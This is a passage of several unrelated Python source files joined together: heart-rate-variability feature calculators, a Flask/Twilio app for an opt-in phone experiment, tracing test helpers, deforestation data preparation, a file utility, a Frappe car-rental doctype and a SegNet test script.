'n': n, 'ms': ms} with f str e.g. 'rmssd', m str
e.g. 'cwt', n int, ms int/float
:type param: list
:return: list of tuples (s, f) where s are the parameters, serialized as a string,
and f the respective feature value as int or float
:return type: pandas.Series
"""
function_map = {
'stdev': ppi_stdev,
'rmssd': ppi_rmssd,
'sdsd': ppi_sdsd,
'nn': ppi_nn,
'pnn': ppi_pnn,
# TODO: ppi_npeaks
}
res = {}
# Find the unique sets of parameters (method, n). For each one of
# them, we only need to find the peaks once.
params_df = pd.DataFrame(param)
unique_params = params_df[['method','n']].drop_duplicates()
unique_params_dicts = unique_params.T.to_dict()
for k, params in unique_params_dicts.items():
peak_locs = get_peak_locs(x, method=params['method'], n=params['n'])
ppis = peaklocs_to_ppis(peak_locs) # TODO: only if some features need it?
# Now that we know the peak locations based on this set of
# params, we can compute all the PPI features.
for idx, row in params_df.iterrows():
if row['method']==params['method'] and row['n']==params['n']:
output_key = convert_to_output_format(row)
result = function_map[row['feature']](
x = x,
method = row['method'],
n = row['n'],
ms = row['ms'] if 'ms' in row else None,
peak_locs = peak_locs,
ppis = ppis,
)
res[output_key] = result
return [(key, value) for key, value in res.items()]
####################### Individual feature calculators: ########################
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_npeaks(x, method, n, peak_locs=None, **kwargs):
"""
Number of peaks.
:param x: the time series to calculate the feature of
:type x: pandas.Series
:param method: how to find peaks ('cwt' or 'normal')
:type method: string
:param n: peak width parameter
:type n: int
:return: the value of this feature
:return type: int
"""
# TODO: this is not useful yet, because tsfresh already computes
# this. but adding more parameters will make it different.
if peak_locs is None:
try:
peak_locs = get_peak_locs(x, method, n)
except:
return np.nan
return len(peak_locs)
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_stdev(x, method, n, peak_locs=None, ppis=None, **kwargs):
"""
Standard deviation in peak-to-peak intervals.
:param x: the time series to calculate the feature of
:type x: pandas.Series
:param method: how to find peaks ('cwt' or 'normal')
:type method: string
:param n: peak width parameter
:type n: int
:return: the value of this feature
:return type: float
"""
if ppis is None:
if peak_locs is None:
try:
peak_locs = get_peak_locs(x, method, n)
except:
return np.nan
if len(peak_locs) < 3:
return np.nan
ppis = peaklocs_to_ppis(peak_locs)
if type(ppis) == pd.TimedeltaIndex:
ppis = ppis.total_seconds()
return np.std(ppis)
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_rmssd(x, method, n, peak_locs=None, ppis=None, **kwargs):
"""
Root mean square of successive differences between adjacent peak-to-peak intervals.
:param x: the time series to calculate the feature of
:type x: pandas.Series
:param method: how to find peaks ('cwt' or 'normal')
:type method: string
:param n: peak width parameter
:type n: int
:return: the value of this feature
:return type: float
"""
if ppis is None:
if peak_locs is None:
try:
peak_locs = get_peak_locs(x, method, n)
except:
return np.nan
if len(peak_locs) < 3:
return np.nan
ppis = peaklocs_to_ppis(peak_locs)
if type(ppis) == pd.TimedeltaIndex:
ppis = ppis.total_seconds()
differences = ppis[1:] - ppis[:-1]
diff_sq = differences**2
mean_diff_sq = np.mean(diff_sq)
result = mean_diff_sq**0.5
return result
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_sdsd(x, method, n, peak_locs=None, ppis=None, **kwargs):
"""
Standard deviation of the successive differences between adjacent peak-to-peak intervals.
:param x: the time series to calculate the feature of
:type x: pandas.Series
:param method: how to find peaks ('cwt' or 'normal')
:type method: string
:param n: peak width parameter
:type n: int
:return: the value of this feature
:return type: float
"""
if ppis is None:
if peak_locs is None:
try:
peak_locs = get_peak_locs(x, method, n)
except:
return np.nan
if len(peak_locs) < 3:
return np.nan
ppis = peaklocs_to_ppis(peak_locs)
if type(ppis) == pd.TimedeltaIndex:
ppis = ppis.total_seconds()
differences = ppis[1:] - ppis[:-1]
return np.std(differences)
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_nn(x, method, n, ms, peak_locs=None, ppis=None, **kwargs):
"""The number of pairs of successive peak-to-peak intervals that
differ by more than `ms` ms in the case of a DatetimeIndex, or by
`ms` samples otherwise.
:param x: the time series to calculate the feature of
:type x: pandas.Series
:param method: how to find peaks ('cwt' or 'normal')
:type method: string
:param n: peak width parameter
:type n: int
:param ms: minimum difference in successive peak-to-peak intervals
:type ms: float
:return: the value of this feature
:return type: int
"""
if ppis is None:
if peak_locs is None:
try:
peak_locs = get_peak_locs(x, method, n)
except:
return np.nan
if len(peak_locs) < 3:
return np.nan
ppis = peaklocs_to_ppis(peak_locs)
if type(ppis) == pd.TimedeltaIndex:
ppis = ppis.total_seconds()
ms = ms / 1000.0
differences = ppis[1:] - ppis[:-1]
count = np.sum(abs(differences) > ms)
return count
@set_property("fctype", "simple")
@set_property("input", "pd.Series")
def ppi_pnn(x, method, n, ms, peak_locs=None, ppis=None, **kwargs):
"""
The proportion of nn(peak_locs, ms) divided by total number of peak-to-peak intervals.
:param x: the time series to calculate the feature of
:type x: pandas.Series
:param method: how to find peaks ('cwt' or 'normal')
:type method: string
:param n: peak width parameter
:type n: int
:param ms: minimum difference in successive peak-to-peak intervals, ms
:type ms: float
:return: the value of this feature
:return type: float
"""
if ppis is None:
if peak_locs is None:
try:
peak_locs = get_peak_locs(x, method, n)
except:
return np.nan
if len(peak_locs) < 3:
return np.nan
ppis = peaklocs_to_ppis(peak_locs)
if len(ppis) < 1:
return np.nan
over = ppi_nn(x, method, n, ms, ppis=ppis)
result = float(over) / len(ppis)
return result
# TODO: don't keep repeating boilerplate stuff in each feature calculator
################################################################################
# TODO: more metrics from https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5422439/
# and https://www.ahajournals.org/doi/10.1161/01.CIR.93.5.1043
# and https://doi.org/10.1152/ajpheart.00421.2020, which is update to first one?
|
<filename>calls/views/weirdness.py
import random
from flask import (
Blueprint,
current_app as app,
redirect,
request,
)
from calls import constants
from calls.models import (
db,
Submission,
Volunteer,
UserCodeConfig,
)
from calls.utils import (
get_gather_times,
parse_sip_address,
protected,
protected_external_url,
render_xml,
sanitize_phone_number,
)
weirdness = Blueprint('weirdness', __name__, url_prefix='/weirdness')
@weirdness.route('/outgoing', methods=('POST',))
@protected
def outgoing():
# We can come from the broadcast outgoing route, where we may want to change behaviour
is_broadcast = parse_sip_address(
request.values.get('From')) == app.config['BROADCAST_SIP_USERNAME']
# If our submit action on the dialed call comes back with status completed,
# that means the dialed party hung up. If this happens in the first 30 secs,
# we'll dial someone else -- otherwise let's hang up on the caller
if (
request.values.get('DialCallStatus') == 'completed'
and int(request.values.get('DialCallDuration', -1)) >= 30
):
context = {}
if not is_broadcast:
context = {
'message': ('Congratulations! You have won! You will receive a FREE '
'Microsoft Zune in 3 to 5 business days.'),
'with_song': True,
}
app.logger.info('Outgoing weirdness call completed')
return render_xml('hang_up.xml', **context)
else:
# 1 in 30 chance we're calling the BMIR broadcast phone (unless this
# call came routed from the broadcast desk)
if (
not is_broadcast
# Make sure this wasn't an outside caller who won the lottery
and not request.values.get('To') == app.config['BROADCAST_NUMBER']
and random.randint(1, constants.WEIRDNESS_RANDOM_CHANCE_OF_RINGING_BROADCAST) == 1
and UserCodeConfig.get('random_weirdness_to_broadcast')
):
app.logger.info('Outgoing weirdness call won lottery, dialing broadcast phone')
return render_xml(
'call.xml',
timeout=20,
record=True,
from_number=app.config['WEIRDNESS_NUMBER'],
action_url=protected_external_url('weirdness.outgoing'),
to_sip_address='{}@{}'.format(
app.config['BROADCAST_SIP_USERNAME'],
app.config['TWILIO_SIP_DOMAIN'],
))
# Otherwise it's a new call OR the person we called didn't confirm.
multiring = UserCodeConfig.get('weirdness_multiring')
volunteers = Volunteer.get_random_opted_in(multiring=multiring)
if volunteers:
to_numbers = [volunteer.phone_number for volunteer in volunteers]
app.logger.info('Outgoing weirdness call to {}'.format(
to_numbers[0] if len(to_numbers) == 1 else to_numbers
))
return render_xml(
'call.xml',
record=True,
timeout=20,
from_number=app.config['WEIRDNESS_NUMBER'],
to_numbers=to_numbers,
action_url=protected_external_url('weirdness.outgoing'),
whisper_url=protected_external_url('weirdness.whisper'),
)
else:
app.logger.info('Outgoing weirdness call found no volunteers. Hanging up.')
return render_xml(
'hang_up.xml',
message='You lose. Thanks for playing! Better luck next time!',
with_song=True,
)
@weirdness.route('/whisper', methods=('POST',))
@protected
def whisper():
confirmed = bool(request.values.get('Digits'))
has_gathered = bool(request.args.get('has_gathered'))
app.logger.info('Whispering to {} (confirmed = {}, gathered = {})'.format(
request.values.get('To'), confirmed, has_gathered))
return render_xml(
'whisper.xml',
confirmed=confirmed,
has_gathered=has_gathered,
action_url=protected_external_url(
'weirdness.whisper', has_gathered='y'),
)
@weirdness.route('/incoming', methods=('POST',))
@protected
def incoming():
from_number = sanitize_phone_number(request.values.get('From'))
if not from_number:
app.logger.info('Incoming weirdness with caller ID blocked')
return render_xml(
'hang_up.xml',
message='Call with your caller ID unblocked to get through. Goodbye!')
enrolled = confirm = False
volunteer = Volunteer.query.filter_by(phone_number=from_number).first()
if volunteer:
enrolled = True
gather_times = get_gather_times()
url_kwargs = {'gather': gather_times}
if request.values.get('Digits') == '1':
if volunteer:
if request.args.get('confirm'):
db.session.delete(volunteer)
db.session.commit()
app.logger.info('Volunteer {} removed by call'.format(from_number))
return render_xml(
'hang_up.xml', with_song=True,
message=('You will no longer receive calls. To sign back up, '
'call this number or go to calls dot B M I R dot org.'))
else:
confirm = True
url_kwargs['confirm'] = 'y'
del url_kwargs['gather']
else:
submission = Submission(phone_number=from_number)
db.session.add(submission)
db.session.commit()
app.logger.info('Volunteer {} added by call'.format(from_number))
return redirect(protected_external_url(
'volunteers.verify', id=submission.id, phoned='y'))
app.logger.info('Got incoming weirdness call from {} (enrolled = {})'.format(
from_number, enrolled))
return render_xml(
'incoming_weirdness.xml',
action_url=protected_external_url('weirdness.incoming', **url_kwargs),
confirm=confirm,
enrolled=enrolled,
gather_times=gather_times,
)
@weirdness.route('/sms', methods=('POST',))
@protected
def sms():
from_number = sanitize_phone_number(request.values.get('From'))
incoming_message = ' '.join(request.values.get('Body', '').lower().split())
volunteer = Volunteer.query.filter_by(phone_number=from_number).first()
if volunteer:
if any(phrase in incoming_message for phrase in ('go away', 'goaway')):
db.session.delete(volunteer)
db.session.commit()
app.logger.info('Volunteer {} removed by sms'.format(from_number))
message = ('You will no longer receive calls from the BMIR Phone Experiment.',
'To sign back up, go to https://calls.bmir.org/ or text "SIGN UP".')
else:
app.logger.info('Got sms from {}'.format(from_number))
message = ('Text "GO AWAY" to stop receiving calls from the BMIR '
'Phone Experiment.')
else:
if from_number:
if any(phrase in incoming_message for phrase in ('sign up', 'signup')):
submission = Submission(phone_number=from_number)
db.session.add(submission)
db.session.commit()
submission.create_volunteer()
app.logger.info('Volunteer {} added by sms'.format(from_number))
message = ('You have signed up for the BMIR Phone Experiment! '
'Text "GO AWAY" to stop receiving calls.',
'NOTE: you could get a called 24 hours a day. To select '
'times of day to receive calls, go to https://calls.bmir.org/')
else:
app.logger.info('Got sms from {}'.format(from_number))
message = ('Text "SIGN UP" or go to to https://calls.bmir.org/ '
'to sign up for the BMIR Phone Experiment.')
else:
message = 'Go to https://calls.bmir.org/ to sign up for BMIR Phone Experiment.'
return render_xml('sms.xml', message=message)
|
<reponame>jdost/dd-trace-py
import contextlib
import os
import sys
import unittest
import ddtrace
from ..utils.tracer import DummyTracer
from ..utils.span import TestSpanContainer, TestSpan, NO_CHILDREN
class BaseTestCase(unittest.TestCase):
"""
BaseTestCase extends ``unittest.TestCase`` to provide some useful helpers/assertions
Example::
from tests import BaseTestCase
class MyTestCase(BaseTestCase):
def test_case(self):
with self.override_config('flask', dict(distributed_tracing_enabled=True):
pass
"""
@staticmethod
@contextlib.contextmanager
def override_env(env):
"""
Temporarily override ``os.environ`` with provided values
>>> with self.override_env(dict(DATADOG_TRACE_DEBUG=True)):
# Your test
"""
# Copy the full original environment
original = dict(os.environ)
# Update based on the passed in arguments
os.environ.update(env)
try:
yield
finally:
# Full clear the environment out and reset back to the original
os.environ.clear()
os.environ.update(original)
@staticmethod
@contextlib.contextmanager
def override_global_config(values):
"""
Temporarily override an global configuration
>>> with self.override_global_config(dict(name=value,...)):
# Your test
"""
# DEV: Uses dict as interface but internally handled as attributes on Config instance
analytics_enabled_original = ddtrace.config.analytics_enabled
report_hostname_original = ddtrace.config.report_hostname
ddtrace.config.analytics_enabled = values.get('analytics_enabled', analytics_enabled_original)
ddtrace.config.report_hostname = values.get('report_hostname', report_hostname_original)
try:
yield
finally:
ddtrace.config.analytics_enabled = analytics_enabled_original
ddtrace.config.report_hostname = report_hostname_original
@staticmethod
@contextlib.contextmanager
def override_config(integration, values):
"""
Temporarily override an integration configuration value
>>> with self.override_config('flask', dict(service_name='test-service')):
# Your test
"""
options = getattr(ddtrace.config, integration)
original = dict(
(key, options.get(key))
for key in values.keys()
)
options.update(values)
try:
yield
finally:
options.update(original)
@staticmethod
@contextlib.contextmanager
def override_http_config(integration, values):
"""
Temporarily override an integration configuration for HTTP value
>>> with self.override_http_config('flask', dict(trace_query_string=True)):
# Your test
"""
options = getattr(ddtrace.config, integration).http
original = {}
for key, value in values.items():
original[key] = getattr(options, key)
setattr(options, key, value)
try:
yield
finally:
for key, value in original.items():
setattr(options, key, value)
@staticmethod
@contextlib.contextmanager
def override_sys_modules(modules):
"""
Temporarily override ``sys.modules`` with provided dictionary of modules
>>> mock_module = mock.MagicMock()
>>> mock_module.fn.side_effect = lambda: 'test'
>>> with self.override_sys_modules(dict(A=mock_module)):
# Your test
"""
original = dict(sys.modules)
sys.modules.update(modules)
try:
yield
finally:
sys.modules.clear()
sys.modules.update(original)
# TODO[tbutt]: Remove this once all tests are properly using BaseTracerTestCase
override_config = BaseTestCase.override_config
class BaseTracerTestCase(TestSpanContainer, BaseTestCase):
"""
BaseTracerTestCase is a base test case for when you need access to a dummy tracer and span assertions
"""
def setUp(self):
"""Before each test case, setup a dummy tracer to use"""
self.tracer = DummyTracer()
super(BaseTracerTestCase, self).setUp()
def tearDown(self):
"""After each test case, reset and remove the dummy tracer"""
super(BaseTracerTestCase, self).tearDown()
self.reset()
delattr(self, 'tracer')
def get_spans(self):
"""Required subclass method for TestSpanContainer"""
return self.tracer.writer.spans
def reset(self):
"""Helper to reset the existing list of spans created"""
self.tracer.writer.pop()
def trace(self, *args, **kwargs):
"""Wrapper for self.tracer.trace that returns a TestSpan"""
return TestSpan(self.tracer.trace(*args, **kwargs))
def start_span(self, *args, **kwargs):
"""Helper for self.tracer.start_span that returns a TestSpan"""
return TestSpan(self.tracer.start_span(*args, **kwargs))
def assert_structure(self, root, children=NO_CHILDREN):
"""Helper to call TestSpanNode.assert_structure on the current root span"""
root_span = self.get_root_span()
root_span.assert_structure(root, children)
@contextlib.contextmanager
def override_global_tracer(self, tracer=None):
original = ddtrace.tracer
tracer = tracer or self.tracer
setattr(ddtrace, 'tracer', tracer)
try:
yield
finally:
setattr(ddtrace, 'tracer', original)
|
<reponame>PatBall1/DeepForestcast
from torchvision.transforms import ToTensor
from PIL import Image
# import rasterio
import numpy as np
import torch
import os.path
def to_Tensor(path, name):
"""
Load Tiff files as tensors
"""
t = Image.open(path + "/" + name)
t = ToTensor()(t)
t = t.squeeze(dim=0)
return t
'''
def to_Tensor(path, name):
"""
Load Tiff files as tensors
"""
t = rasterio.open(path + "/" + name)
t = ToTensor()(t)
t = t.squeeze(dim=0)
return t
'''
def last_to_image(path, year):
"""
Given path to folder having tiff files for each last band for given year
returns Tensors with chanels == bands and year as requested in the path
"""
image = []
for b in range(1, 5):
band = Image.open(path + "/last_20%d_%d.tif" % (year, b))
band = ToTensor()(band)
image.append(band)
image = torch.cat(image, dim=0)
image = image.float()
return image
def rescale_image(image):
# detach and clone the image so that you don't modify the input, but are returning new tensor.
rescaled_image = image.data.clone()
if len(image.shape) == 2:
rescaled_image = rescaled_image.unsqueeze(dim=0)
# Compute mean and std only from non masked pixels
# Spatial coordinates of this pixels are:
pixels = (rescaled_image[0, :, :] != -1).nonzero()
mean = rescaled_image[:, pixels[:, 0], pixels[:, 1]].mean(1, keepdim=True)
std = rescaled_image[:, pixels[:, 0], pixels[:, 1]].std(1, keepdim=True)
rescaled_image[:, pixels[:, 0], pixels[:, 1]] -= mean
rescaled_image[:, pixels[:, 0], pixels[:, 1]] /= std
if len(image.shape) == 2:
rescaled_image = rescaled_image.squeeze(dim=0)
mean = mean.squeeze(dim=0)
std = std.squeeze(dim=0)
return (rescaled_image, mean, std)
def if_def_when(lossyear, year, cutoffs=[2, 5, 8]):
"""
Creates categorical variables for deforestration event given cutoffs.
Values in cutoffs define the time bins
Returns len(cutoffs) + 1 categorical layers:
Example: cutoffs = [2,5,8], num of layers = 4 , considered year = year
Categories:
0) if year - lossyear is in [0,2)
1) if year - lossyear is in [2,5)
2) if year - lossyear is in [5,8)
3) 8 years ago or more
No prior knowledge:
if loss event is in year > considered year or pixel is non deforested up to 2018+, all categories have value 0
"""
cutoffs.append(year)
cutoffs.insert(0, 0)
lossyear[(lossyear > year)] = 0
losses = []
for idx in range(0, len(cutoffs) - 1):
deff = torch.zeros(lossyear.size())
deff[
(cutoffs[idx] <= (year - lossyear)) & ((year - lossyear) < cutoffs[idx + 1])
] = 1
losses.append(deff.float())
losses = torch.stack(losses)
# Return Nan values encoded as needed:
losses[:, (lossyear == -1)] = -1
return losses
def create_tnsors_pixels(
year,
latest_yr,
tree_p=30,
cutoffs=[2, 5, 8],
sourcepath=None,
rescale=True,
wherepath=None,
):
"""
Given year, and cutoffs as defined above returns (and save if wherepath!= None)
Static tensor,
Non static tensor,
list of valid pixels coordinates,
list of labels corresponding to this valid cordinates
sourcepath = path to tiff files
wherepath = in not None, path to where to save the tensors
Static tensor is identical for any year, hence save only once
Static tensor has datamask layer and treecover
Nonstatic tensor has if_deff_when categorical layers and the image landset 7 bands stacked
Valid pixels are these that meet all the following conditions :
1. datamask == 1 , eg land not water body
2. tree_cover > tree_p or gain == 1 if tree canopy in 2000 > tree_p or became forest up to 2012
3. lossyear > year or lossyear == 0 experienced loss only after that year (or not at all in the study period)
4. buffer == 0 is in Madre de Dios area
for each valid pixel assign label 1 if it is deforested in exactly in year+1 or zero otherwise
All pixels in the rasters and produced tensors have value 111 in the locations outside Area of Interest and its buffer
"""
buffer = to_Tensor(sourcepath, "buffer.tif")
gain = to_Tensor(sourcepath, "gain_20" + str(latest_yr) + ".tif")
lossyear = to_Tensor(sourcepath, "lossyear_20" + str(latest_yr) + ".tif")
datamask = to_Tensor(sourcepath, "datamask_20" + str(latest_yr) + ".tif")
tree_cover = to_Tensor(sourcepath, "treecover2000_20" + str(latest_yr) + ".tif")
tree_cover = tree_cover.float()
datamask = datamask.float()
# Create list of valid pixels coordinates
pixels = (
(datamask == 1)
& ((tree_cover > tree_p) | (gain == 1)) # land (not water body)
& ( # if forest in 2000 or became forest up to 2012
(lossyear > year) | (lossyear == 0)
)
& ( # experienced loss only after that year (or not at all in the study period)
buffer == 0
)
).nonzero() # In area of interest
# Create list of valid pixels labels in year + 1
labels = lossyear[pixels[:, 0], pixels[:, 1]] == (
year + 1
) # can be change to >= (year+1) & <111
# Could add here labels for +2 years
# labels2 = lossyear[pixels[:, 0], pixels[:, 1]] == (
# year + 2
# )
# labels = labels + 2*labels2
when = if_def_when(lossyear, year, cutoffs=cutoffs)
image = last_to_image(sourcepath, year)
if rescale:
# Rescale datamask to have values -1 for nan, 0 for land, 1 for water
datamask[datamask != -1] = datamask[datamask != -1] - 1
# Rescale tree_cover to have values in [0, 1] and -1 for nan
tree_cover[tree_cover != -1] = tree_cover[tree_cover != -1] * 0.01
# Normalize image by channel with -1 values for nan
image, _, _ = rescale_image(image)
# Create non Static tensor
image = torch.cat((when, image), dim=0)
# Creates static tensor
static = torch.stack((datamask, tree_cover))
# Creates non static tensor
if wherepath:
if not os.path.isfile(wherepath + "/" + "static.pt"):
torch.save(static, wherepath + "/" + "static.pt")
torch.save(image, wherepath + "/" + "tensor_%d.pt" % (year))
torch.save(pixels, wherepath + "/" + "pixels_cord_%d.pt" % (year))
torch.save(labels, wherepath + "/" + "labels_%d.pt" % (year))
return static, image, pixels, labels
|
import logging
import json
import os
from os.path import exists
import time
import shutil
__author__ = "<NAME>"
__copyright__ = "<NAME>"
__license__ = "MIT"
_logger = logging.getLogger(__name__)
generation_types = ['schemas', 'analyzers']
class FileUtility:
@staticmethod
def generate_json_file(database_name, data, generation_type):
file_name = FileUtility.get_filename(database_name)
json_schema = json.dumps(data, indent=4)
if generation_type not in generation_types:
raise Exception("generation_type {type} not found!".format(type=generation_type))
path = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)), 'generated')
with open('{path}/{type}/{file_name}.json'.format(path=path, file_name=file_name, type=generation_type),
'w') as outfile:
outfile.write(json_schema)
@staticmethod
def get_filename(database_name):
file_date = time.strftime("%Y%m%d")
return "{database}_{date}".format(database=database_name, date=file_date)
@staticmethod
def is_generated_file_exist(database_name, generation_type):
full_path = FileUtility.get_generated_file_path(database_name, generation_type)
return exists(full_path)
@staticmethod
def load_generated_file(database_name, generation_type):
full_path = FileUtility.get_generated_file_path(database_name, generation_type)
with open(full_path) as json_file:
return json.load(json_file)
@staticmethod
def get_generated_file_path(database_name, generation_type):
file_name = FileUtility.get_filename(database_name)
path = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)), 'generated')
return '{path}/{type}/{file_name}.json'.format(path=path, file_name=file_name, type=generation_type)
@staticmethod
def get_csv_file_directory_path(database_name):
generated_path = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)), 'generated')
return "{path}/csvs/{database_name}".format(path=generated_path, database_name=database_name)
@staticmethod
def get_csv_file_path(table_name, database_name):
file_name = FileUtility.get_filename(table_name)
directory_path = FileUtility.get_csv_file_directory_path(database_name)
if not os.path.exists(directory_path):
os.makedirs(directory_path)
return '{path}/{file_name}.csv'.format(path=directory_path, file_name=file_name)
@staticmethod
def read_file(file_path):
file = open(file_path)
contents = file.read()
file.close()
return contents
@staticmethod
def delete_files(folder_path):
for filename in os.listdir(folder_path):
file_path = os.path.join(folder_path, filename)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
except Exception as e:
_logger.error('Failed to delete %s. Reason: %s' % (file_path, e))
@staticmethod
def purge_generated_files():
generated_schemas_path = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)), 'generated/schemas')
generated_analyzers_path = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)), 'generated/analyzers')
generated_csvs_path = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)), 'generated/csvs')
FileUtility.delete_files(generated_schemas_path)
FileUtility.delete_files(generated_analyzers_path)
FileUtility.delete_files(generated_csvs_path)
@staticmethod
def purge_analyzer_files():
generated_analyzers_path = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)), 'generated/analyzers')
print("- Purging old analyzer files...")
FileUtility.delete_files(generated_analyzers_path)
@staticmethod
def purge_schema_files():
generated_schemas_path = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)), 'generated/schemas')
print("- Purging old schema files...")
FileUtility.delete_files(generated_schemas_path)
@staticmethod
def purge_csv_files(database):
generated_csvs_path = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)), 'generated/csvs/{database}'.format(database=database))
print("- Purging old CSV files...")
FileUtility.delete_files(generated_csvs_path)
@staticmethod
def zip_and_save_folder(path, export_path):
shutil.make_archive(export_path, 'zip', path)
@staticmethod
def get_files_in_workspace(workspace_path, args):
workspace_files=os.listdir(workspace_path)
acceptable_files = {}
option = 1
for file in workspace_files:
if file.lower().endswith(('.csv', '.zip')):
acceptable_files[option] = "{workspace_path}{file}".format(workspace_path=workspace_path, file=file)
if not args.disablePrompt:
print("- Option {option}: {file_name}".format(option=option, file_name=file))
option += 1
return acceptable_files
|
<filename>angola_erp/rent_a_car/doctype/ficha_tecnica_da_viatura/ficha_tecnica_da_viatura.py
# -*- coding: utf-8 -*-
# Copyright (c) 2019, <NAME> and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe import throw
from frappe.utils import formatdate, encode, date_diff
from frappe.model.document import Document
from frappe.model.naming import make_autoname
from datetime import datetime, timedelta
from frappe.utils import cstr, get_datetime, getdate, cint, get_datetime_str
class FichaTecnicadaViatura(Document):
def autoname(self):
self.ficha_numero = make_autoname(self.naming_series)
self.name = self.ficha_numero
if self.entrada_ou_saida_viatura == "Entrada":
print('autoname entrada')
self.docstatus = 0
else:
frappe.db.set_value("Vehicle",self.matricula_veiculo, "entrada_ou_saida", "Stand-by")
frappe.db.commit()
print('primeiro registo...')
print('primeiro registo...')
print('primeiro registo...')
print('primeiro registo...')
self.docstatus = 0
def validate(self):
#validar
if self.entrada_ou_saida_viatura == "Entrada":
print('validar entrada')
if self.kms_entrada < self.kms_saida:
frappe.throw(_("Kilometros de Entrada errada!!!"))
validated = False
self.docstatus = 0
else:
#tem que verificar se o vehicle esta em Stand-by... caso nao alguem ja alugou...
is_free = frappe.get_doc("Vehicle",self.matricula_veiculo)
if not is_free.entrada_ou_saida == "Stand-by":
frappe.throw(_("Esta viatura já está alugada, não é possivel continuar!!!"))
validated = False
#if self.docstatus == 1:
# self.criar_carro_lastmile()
def before_save(self):
if self.entrada_ou_saida_viatura == "Entrada":
print('valor a pgar#')
print('valor a pgar#')
print(date_diff(self.data_saida_estacao,self.data_entrada_estacao))
print (self.preco_dia_basico * date_diff(self.data_entrada_estacao, self.data_saida_estacao))
self.total_dias = self.preco_dia_basico * date_diff(self.data_entrada_estacao, self.data_saida_estacao)
def on_submit(self):
#self.docstatus = 1
print('on submit')
print('on submit')
print('on submit')
print('on submit')
print('on submit')
def on_cancel(self):
self.docstatus = 2 #cancela o submeter
def before_cancel(self):
if self.entrada_ou_saida_viatura == "Entrada":
frappe.db.set_value("Vehicle",self.matricula_veiculo, "entrada_ou_saida", "Saida")
frappe.db.commit()
self.status_viatura = 'Alugada'
#ainda falta repor o Contracto.....
else:
#set the car leased on Vehicle so no one can rent....
frappe.db.set_value("Vehicle",self.matricula_veiculo, "entrada_ou_saida", "Stand-by")
frappe.db.commit()
self.status_viatura = 'Stand-by'
def before_submit(self):
if self.entrada_ou_saida_viatura == "Entrada":
print('Entradadada')
print('Entradadada')
print('Entradadada')
print('Entradadada')
#set carro as Saida
frappe.db.set_value("Vehicle",self.matricula_veiculo, "entrada_ou_saida", "Stand-by")
frappe.db.set_value("Vehicle",self.matricula_veiculo, "veiculo_alugado", 0)
frappe.db.commit()
#set contracto as Terminado.
frappe.db.set_value("Contractos Rent",self.contracto_numero, "status_contracto", "Terminou")
frappe.db.commit()
#procura a Ficha de SAIDA para por como
fichasaida = frappe.model.frappe.get_all('Ficha Tecnica da Viatura',filters={'contracto_numero':self.contracto_numero,'docstatus':1,'entrada_ou_saida_viatura': 'Saida'},fields=['name','contracto_numero'])
print(fichasaida[0].name)
print(fichasaida)
if fichasaida:
frappe.db.set_value("Ficha Tecnica da Viatura",fichasaida[0].name, "status_viatura", "Devolvida")
frappe.db.commit()
#NAO SERVE AQUI...
self.status_viatura = 'Devolvida'
self.docstatus = 1
else:
#set carro as Saida
print('before submit')
print('saida')
frappe.db.set_value("Vehicle",self.matricula_veiculo, "entrada_ou_saida", "Saida")
frappe.db.commit()
self.status_viatura = 'Alugada'
self.criar_carro_lastmile()
def criar_carro_lastmile(self):
print "Criar o lastmile do carro ...."
print(self.entrada_ou_saida_viatura)
print(self.kms_saida)
print(self.kms_entrada)
if self.entrada_ou_saida_viatura == "Entrada":
car_lastmile = frappe.get_doc({
"doctype": "Vehicle_lastmile",
"matricula": self.matricula_veiculo,
"ultimo_km": self.kms_entrada
})
else:
car_lastmile = frappe.get_doc({
"doctype": "Vehicle_lastmile",
"matricula": self.matricula_veiculo,
"ultimo_km": self.kms_saida,
})
#car_lastmile.flags.ignore_validate = True
car_lastmile.insert()
|
from pytorch_segnet import *
import sys
import csv
def test(SegNet):
SegNet.load_state_dict(torch.load(WEIGHTS,map_location=torch.device('cpu')))
SegNet.eval()
paths = os.listdir(SAMPLES)
for path in paths:
image_src = cv.imread(SAMPLES + path)
image = cv.resize(image_src, (416, 416))
image = image / 255.0
image = torch.Tensor(image)
image = image.permute(2, 0, 1)
image = torch.unsqueeze(image, dim=0)
output, relu_value = SegNet(image)
output = torch.squeeze(output)
output = output.argmax(dim=0)
output_np = cv.resize(np.uint8(output), (2048, 1024))
image_seg = np.zeros((1024, 2048, 3))
image_seg = np.uint8(image_seg)
mask = np.zeros((1024, 2048, 3))
mask = np.uint8(mask)
label = ['road','sidewalk','building','wall','fence','pole','traffic light','traffic sign','vegetation','terrain','sky'
,'person','rider','car','truck','bus','train','motocycle','bicycle']
colors = COLORS
for c in range(CLASS_NUM):
image_seg[:, :, 0] += np.uint8((output_np == c)) * np.uint8(colors[c][0])
image_seg[:, :, 1] += np.uint8((output_np == c)) * np.uint8(colors[c][1])
image_seg[:, :, 2] += np.uint8((output_np == c)) * np.uint8(colors[c][2])
with open("./user_info.csv","w",newline='') as f:
writer=csv.writer(f)
for column in image_seg:
writer.writerow(column)
image_seg = Image.fromarray(np.uint8(image_seg))
image_src = cv.cvtColor(image_src,cv.COLOR_BGR2RGB)
old_image = Image.fromarray(np.uint8(image_src))
image = Image.blend(old_image, image_seg, 0.6)
# image_np = np.array(image)
# image_np[output_np == 0] = image_src[output_np == 0]
# image = Image.fromarray(image_np)
image.save(OUTPUTS + path)
print(path + " is done!")
parser = argparse.ArgumentParser()
parser.add_argument("--class_num", type=int, default=19, help="number of classes")
